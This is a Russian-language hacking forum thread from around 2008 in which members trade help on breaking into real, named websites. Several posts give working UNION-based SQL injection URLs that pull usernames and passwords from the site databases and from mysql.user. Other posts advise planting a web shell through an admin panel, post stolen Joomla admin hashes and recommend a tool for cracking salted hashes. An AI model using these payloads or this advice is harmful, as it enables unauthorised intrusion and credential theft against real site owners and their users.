Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Посмотрите если инклуд
    http://admzven.ru/cgi-bin/document.pl?action=showFullDoc&p=1'
     
  2. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ?
    Евал шелл имеется
     
    1 person likes this.
  3. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    230
    Likes Received:
    70
    Reputations:
    -3
    0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит
     
    1 person likes this.
  4. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://nightspirits.net/forum/ на лови
     
  5. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Доброго времени суток всем.
    Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример:
    _http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+tarma_kasutajad+limit+0,1/*

    для наглядности зделаем ошибку в поле с именем nimi, заменим на name
    _http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+from+tarma_kasutajad+limit+0,1/*
    и картина уже совершенно иная.
    Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)
     
    1 person likes this.
  6. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2zjuk@ полей для вывода нет выход только слепая иньекция )
     
  7. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Это печально =(((
     
    1 person likes this.
  8. serfertty

    serfertty Guest

    Reputations:
    0
    ТОварисчи есть ли методы обхода mod-rewrite,а то скуль нашел.Гуглил.
     
  9. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    сегодня гуляя по сайте наткнулся на такое...

    Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150

    Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151

    интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
    http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
     
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150

    Нету доступа к мускулю. Это не уязвимость.
     
  11. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    ясн спасибо
     
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    какие мысли ?
     
  13. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Да что то информатион_схема недоступна.
    Но мысли есть вот такие
    http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HEX(password)),3,4,UNHEX(HEX(user_name)),6,7+from+user
    ;)

    Вдогонку ;)
    http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HEX(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.user+limit+0,1
     
    #2953 Red_Red1, 17 Aug 2008
    Last edited: 17 Aug 2008
    1 person likes this.
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ;)
    это понятно..) я про information_schema спрашивал. всеровно спс.)

    ап
     
    #2954 sabe, 17 Aug 2008
    Last edited: 17 Aug 2008
  15. Cry Wolf

    Cry Wolf New Member

    Joined:
    18 Jul 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мыла
    получил переадресацию на другой сайт.

    alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:

    Это уязвимость? Или просто тупой глюк?
     
    1 person likes this.
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ' ? = sql inj
     
  17. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Достал я парол я хэши из джумлы

    admin:6f0f0e2db9c8f58e2b309afa6569f744:eek:SX0uUSDl4IrdL63

    или

    admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvvaP7o9I

    а как его рассшифровать?
    где сервисы? просто md5 не помогает тут он какойто хитрожопый
    как такое расшифровывать?
     
  18. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    прога PasswordsPro при добавлении тип хеша указываешь MD5(HMAC), должно помочь
     
  19. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать
     
  20. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Это не кадабра, это соль. Юзай PasswordsPro
     
Thread Status:
Not open for further replies.